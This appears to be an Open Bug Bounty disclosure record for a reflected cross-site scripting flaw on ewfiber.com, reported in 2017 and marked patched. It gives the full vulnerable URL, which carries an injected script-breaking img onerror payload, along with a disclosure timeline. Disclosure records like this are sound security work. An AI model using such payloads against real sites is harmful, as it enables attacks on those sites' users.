ewfiber.com XSS vulnerability

2017-07-11T01:00:00
ID OBB:262786
Type openbugbounty
Reporter OmniGooch
Modified 2017-11-27T09:37:00

Description

Vulnerable URL:
https://ewfiber.com/qualify-search/?a=%3C/script%3E%3Cimg%20src=x%20onerror=prompt(/XSSPOSED/)%3E%20Ct%2C%20Bettendorf%2C%20IA%2052722%2C%20USA
Details:

Description| Value
---|---
Patched:| Yes, at 27.11.2017
Latest check for patch:| 27.11.2017 09:37 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1098156
VIP website status:| No
Check ewfiber.com SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 11 July, 2017 01:00 GMT
Generic security notifications sent to website owner| 11 July, 2017 01:03 GMT
Notification sent to subscribers (without technical details)| 11 July, 2017 02:17 GMT
Vulnerability details disclosed by researcher| 18 July, 2017 01:15 GMT
Vulnerability patched by the website owner| 27 November, 2017 09:37 GMT